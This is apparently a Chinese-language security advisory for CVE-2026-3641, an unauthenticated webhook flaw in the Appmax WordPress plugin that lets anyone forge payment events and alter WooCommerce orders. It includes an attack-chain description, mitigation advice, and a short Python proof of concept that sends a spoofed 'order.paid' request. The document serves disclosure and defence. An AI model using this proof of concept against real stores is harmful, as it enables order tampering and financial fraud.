CVE-2026-3641 CVSS 5.3 中危

CVE-2026-3641 Appmax插件输入验证漏洞

披露日期: 2026-03-21

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-3641

漏洞类型

输入验证不当

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Appmax WordPress Plugin

漏洞概述

WordPress Appmax插件在1.0.3及之前版本中存在输入验证不当漏洞。该插件在`/webhook-system`端点注册了一个公开的REST API webhook，但未实现签名验证或身份认证机制。未认证的攻击者可以伪造恶意Webhook载荷，利用`event`和`data`参数直接处理不受信任的输入。此漏洞允许攻击者修改现有WooCommerce订单状态（如退款、取消）、创建包含任意数据的新订单和新产品，或写入任意订单元数据，对电商系统造成严重影响。

技术细节

该漏洞的核心在于Appmax插件的Webhook处理组件缺乏安全校验机制。插件在`/webhook-system`路径公开注册了REST API接口用于接收支付状态通知，但代码逻辑中未对接收到的请求进行来源合法性验证（例如缺少HMAC签名校验或Secret Token比对）。攻击者无需任何用户凭证，即可向该端点发送特制的POST请求。系统直接解析请求体中的`event`（事件类型）和`data`（数据载荷）参数，并传递给后续的业务逻辑处理。由于无法区分合法支付网关和恶意请求，攻击者可以模拟`order.paid`或`order.refunded`等事件，调用`class-appmax-payments-order-paid.php`等文件中的函数，从而篡改数据库中的订单状态、创建虚假商品或订单，严重破坏了业务数据的完整性。

攻击链分析

STEP 1

侦察

攻击者识别出目标网站使用了存在漏洞的Appmax WordPress插件（版本<=1.0.3）。

STEP 2

漏洞利用

攻击者向`/webhook-system`端点发送特制的HTTP POST请求，在请求体中伪造`event`和`data`参数，模拟合法的支付回调。

STEP 3

执行操作

插件后端接收请求并直接处理数据，执行攻击者指定的逻辑，如修改订单状态为“已退款”或创建包含恶意信息的新商品。

STEP 4

达成目标

WooCommerce数据库被篡改，导致业务逻辑混乱、财务损失或数据完整性受损。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (The actual REST endpoint path may vary based on WP configuration)
target_url = "http://target-site.com/wp-json/appmax/v1/webhook-system"

# Malicious payload to spoof an order paid event
# This attempts to change order status for order ID 1001
payload = {
    "event": "order.paid",
    "data": {
        "id": "1001",
        "status": "processing",
        # Additional arbitrary data can be injected here
        "custom_meta": "attacker_controlled_value"
    }
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Send unauthenticated POST request
    response = requests.post(target_url, json=payload, headers=headers)
    
    if response.status_code == 200:
        print("[+] Request sent successfully. Check order status to verify exploitation.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[!] Error: {e}")

影响范围

Appmax plugin for WordPress <= 1.0.3

防御指南

临时缓解措施

建议立即升级插件至最新版本。若暂无法升级，应考虑禁用Appmax插件或通过Web应用防火墙（WAF）拦截对`/webhook-system`接口的未授权外部访问请求。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表